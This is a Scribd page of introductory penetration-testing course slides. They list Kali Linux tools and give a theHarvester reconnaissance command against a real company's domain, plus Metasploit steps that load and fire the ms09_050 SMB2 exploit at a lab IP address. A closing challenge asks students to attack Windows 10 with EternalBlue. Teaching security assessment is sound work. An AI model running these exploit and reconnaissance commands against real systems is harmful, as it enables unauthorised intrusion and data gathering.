Scribd
Upload
23 views3 pages

Module 12 - Security Assessment With Linux

The document outlines notable tools for security assessment using Kali Linux, including theHarvester, Nmap, Metasploit, and Wireshark. It also lists pentest reporting tools like Cherry Tree and Libra office, and provides specific commands for using theHarvester and Metasploit for exploits. Additionally, it presents a challenge to attack Windows 10 using the ms17_010 eternalblue exploit.

Uploaded by

goku
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
23 views3 pages

Module 12 - Security Assessment With Linux

The document outlines notable tools for security assessment using Kali Linux, including theHarvester, Nmap, Metasploit, and Wireshark. It also lists pentest reporting tools like Cherry Tree and Libra office, and provides specific commands for using theHarvester and Metasploit for exploits. Additionally, it presents a challenge to attack Windows 10 using the ms17_010 eternalblue exploit.

Uploaded by

goku
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 3

18/2/2024

Module 12
Security Assessment with Linux
Thu Ya

Notable tools in Kali


• theHarvester (theHarvester)
• Nikto
• Nmap
• Metasploit
• Burp proxy
• Wireshark
• Hashcat/hydra
• wpscan
• scapy

• Aircrack-ng
• Social Engineering Toolkit
• Reaver (wps pin brute force/ WiFi Protected Setup Attack Tool)
• Ettercap
• Netcat

1
18/2/2024

Pentest Reporting tools in Kali Linux


• Cherry Tree
• Record my desk
• Libra office
• Magic Tree

theHarvester
• theHarvester –h
• theHarvester -d ooredoo.com.mm -b dnsdumpster,urlscan,yahoo

• SOURCE
• anubis, baidu, bevigil, binaryedge, bing, bingapi, bufferoverun, brave,
censys, certspotter, criminalip, crtsh, dnsdumpster, duckduckgo,
fullhunt, github-code, hackertarget, hunter, hunterhow, intelx, netlas,
onyphe, otx, pentesttools, projectdiscovery, rapiddns, rocketreach,
securityTrails, sitedossier, subdomaincenter, subdomainfinderc99,
threatminer, tomba, urlscan, virustotal, yahoo, zoomeye

Metasploit (exploit to windows Server 2008)


• Msfconsole
• use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
• set RHOSTS 192.168.15.178
• exploit

2
18/2/2024

Challenge
• Try to attack Windows10 with ms17_010 eternalblue exploit.

You might also like